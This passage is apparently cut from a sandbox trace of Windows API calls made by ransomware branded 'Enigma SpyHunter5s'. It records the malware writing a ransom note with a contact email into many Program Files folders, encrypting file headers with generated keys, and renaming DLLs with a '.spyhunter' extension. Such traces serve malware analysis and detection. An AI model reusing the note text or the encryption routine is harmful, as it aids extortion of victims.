lpMem=0x381880 | out: hHeap=0x2c0000) returned 1 [0091.780] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\services\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0091.781] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.781] WriteFile (in: hFile=0x178, lpBuffer=0x57fd2f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fe58, lpOverlapped=0x0 | out: lpBuffer=0x57fd2f*, lpNumberOfBytesWritten=0x57fe58*=0x127, lpOverlapped=0x0) returned 1 [0091.782] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.782] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fe58, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fe58*=0x2ac, lpOverlapped=0x0) returned 1 [0091.782] CloseHandle (hObject=0x178) returned 1 [0091.782] GetProcessHeap () returned 0x2c0000 [0091.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34c8d8 | out: hHeap=0x2c0000) returned 1 [0091.782] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fdf8 | out: pbBuffer=0x57fdf8) returned 1 [0091.782] GetProcessHeap () returned 0x2c0000 [0091.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.782] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fdf0*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fdf0*=0x30) returned 1 [0091.783] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.783] GetProcessHeap () returned 0x2c0000 [0091.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0091.783] GetProcessHeap () returned 0x2c0000 [0091.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329dd8 | out: hHeap=0x2c0000) returned 1 [0091.783] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0091.787] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.787] WriteFile (in: hFile=0x178, lpBuffer=0x57fd27*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fe50, lpOverlapped=0x0 | out: lpBuffer=0x57fd27*, lpNumberOfBytesWritten=0x57fe50*=0x127, lpOverlapped=0x0) returned 1 [0091.788] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.788] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fe50, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fe50*=0x2ac, lpOverlapped=0x0) returned 1 [0091.788] CloseHandle (hObject=0x178) returned 1 [0091.789] GetProcessHeap () returned 0x2c0000 [0091.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358200 | out: hHeap=0x2c0000) returned 1 [0091.789] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0091.789] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.789] WriteFile (in: hFile=0x178, lpBuffer=0x57fd23*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fe4c, lpOverlapped=0x0 | out: lpBuffer=0x57fd23*, lpNumberOfBytesWritten=0x57fe4c*=0x127, lpOverlapped=0x0) returned 1 [0091.790] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.790] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fe4c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fe4c*=0x2ac, lpOverlapped=0x0) returned 1 [0091.790] CloseHandle (hObject=0x178) returned 1 [0091.790] GetProcessHeap () returned 0x2c0000 [0091.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a260 | out: hHeap=0x2c0000) returned 1 [0091.791] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0091.791] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.791] WriteFile (in: hFile=0x178, lpBuffer=0x57fd1f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fe48, lpOverlapped=0x0 | out: lpBuffer=0x57fd1f*, lpNumberOfBytesWritten=0x57fe48*=0x127, lpOverlapped=0x0) returned 1 [0091.792] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.792] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fe48, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fe48*=0x2ac, lpOverlapped=0x0) returned 1 [0091.792] CloseHandle (hObject=0x178) returned 1 [0091.793] GetProcessHeap () returned 0x2c0000 [0091.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37b220 | out: hHeap=0x2c0000) returned 1 [0091.793] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0091.794] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.794] WriteFile (in: hFile=0x178, lpBuffer=0x57fd1b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fe44, lpOverlapped=0x0 | out: lpBuffer=0x57fd1b*, lpNumberOfBytesWritten=0x57fe44*=0x127, lpOverlapped=0x0) returned 1 [0091.795] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.795] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fe44, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fe44*=0x2ac, lpOverlapped=0x0) returned 1 [0091.795] CloseHandle (hObject=0x178) returned 1 [0091.796] GetProcessHeap () returned 0x2c0000 [0091.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37b110 | out: hHeap=0x2c0000) returned 1 [0091.796] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fde0 | out: pbBuffer=0x57fde0) returned 1 [0091.796] GetProcessHeap () returned 0x2c0000 [0091.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0091.796] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fdd8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fdd8*=0x30) returned 1 [0091.796] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpwec.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0091.801] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL") returned 89 [0091.801] StrStrW (lpFirst="FPWEC.DLL", lpSrch=".txt") returned 0x0 [0091.801] GetProcessHeap () returned 0x2c0000 [0091.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x347830 [0091.802] ReadFile (in: hFile=0x178, lpBuffer=0x347830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fd9c, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesRead=0x57fd9c*=0x2800, lpOverlapped=0x0) returned 1 [0091.810] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.810] WriteFile (in: hFile=0x178, lpBuffer=0x347830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fd9c, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesWritten=0x57fd9c*=0x2800, lpOverlapped=0x0) returned 1 [0091.810] GetProcessHeap () returned 0x2c0000 [0091.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347830 | out: hHeap=0x2c0000) returned 1 [0091.811] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.811] WriteFile (in: hFile=0x178, lpBuffer=0x57fddc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fd9c, lpOverlapped=0x0 | out: lpBuffer=0x57fddc*, lpNumberOfBytesWritten=0x57fd9c*=0x4, lpOverlapped=0x0) returned 1 [0091.849] WriteFile (in: hFile=0x178, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fd9c, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x57fd9c*=0x30, lpOverlapped=0x0) returned 1 [0091.849] CloseHandle (hObject=0x178) returned 1 [0092.024] GetProcessHeap () returned 0x2c0000 [0092.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0092.024] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL.spyhunter") returned 99 [0092.025] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpwec.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpwec.dll.spyhunter")) returned 1 [0092.025] GetProcessHeap () returned 0x2c0000 [0092.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0092.025] GetProcessHeap () returned 0x2c0000 [0092.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0092.025] GetProcessHeap () returned 0x2c0000 [0092.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a160 | out: hHeap=0x2c0000) returned 1 [0092.025] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\system\\msmapi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0092.028] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.028] WriteFile (in: hFile=0x178, lpBuffer=0x57fd13*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fe3c, lpOverlapped=0x0 | out: lpBuffer=0x57fd13*, lpNumberOfBytesWritten=0x57fe3c*=0x127, lpOverlapped=0x0) returned 1 [0092.029] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.029] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fe3c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fe3c*=0x2ac, lpOverlapped=0x0) returned 1 [0092.029] CloseHandle (hObject=0x178) returned 1 [0092.030] GetProcessHeap () returned 0x2c0000 [0092.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358d60 | out: hHeap=0x2c0000) returned 1 [0092.030] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0092.045] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.045] WriteFile (in: hFile=0x178, lpBuffer=0x57fd0f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fe38, lpOverlapped=0x0 | out: lpBuffer=0x57fd0f*, lpNumberOfBytesWritten=0x57fe38*=0x127, lpOverlapped=0x0) returned 1 [0092.046] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.046] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fe38, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fe38*=0x2ac, lpOverlapped=0x0) returned 1 [0092.046] CloseHandle (hObject=0x178) returned 1 [0092.047] GetProcessHeap () returned 0x2c0000 [0092.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e3b0 | out: hHeap=0x2c0000) returned 1 [0092.047] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fdd8 | out: pbBuffer=0x57fdd8) returned 1 [0092.047] GetProcessHeap () returned 0x2c0000 [0092.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.047] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57fdd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57fdd0*=0x30) returned 1 [0092.047] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\msosvint.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0092.198] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL") returned 80 [0092.199] StrStrW (lpFirst="MSOSVINT.DLL", lpSrch=".txt") returned 0x0 [0092.199] GetProcessHeap () returned 0x2c0000 [0092.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x349838 [0092.199] ReadFile (in: hFile=0x16c, lpBuffer=0x349838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fd94, lpOverlapped=0x0 | out: lpBuffer=0x349838*, lpNumberOfBytesRead=0x57fd94*=0x2800, lpOverlapped=0x0) returned 1 [0092.239] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.239] WriteFile (in: hFile=0x16c, lpBuffer=0x349838*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fd94, lpOverlapped=0x0 | out: lpBuffer=0x349838*, lpNumberOfBytesWritten=0x57fd94*=0x2800, lpOverlapped=0x0) returned 1 [0092.239] GetProcessHeap () returned 0x2c0000 [0092.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x349838 | out: hHeap=0x2c0000) returned 1 [0092.239] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.239] WriteFile (in: hFile=0x16c, lpBuffer=0x57fdd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fd94, lpOverlapped=0x0 | out: lpBuffer=0x57fdd4*, lpNumberOfBytesWritten=0x57fd94*=0x4, lpOverlapped=0x0) returned 1 [0092.240] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fd94, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57fd94*=0x30, lpOverlapped=0x0) returned 1 [0092.240] CloseHandle (hObject=0x16c) returned 1 [0092.241] GetProcessHeap () returned 0x2c0000 [0092.241] 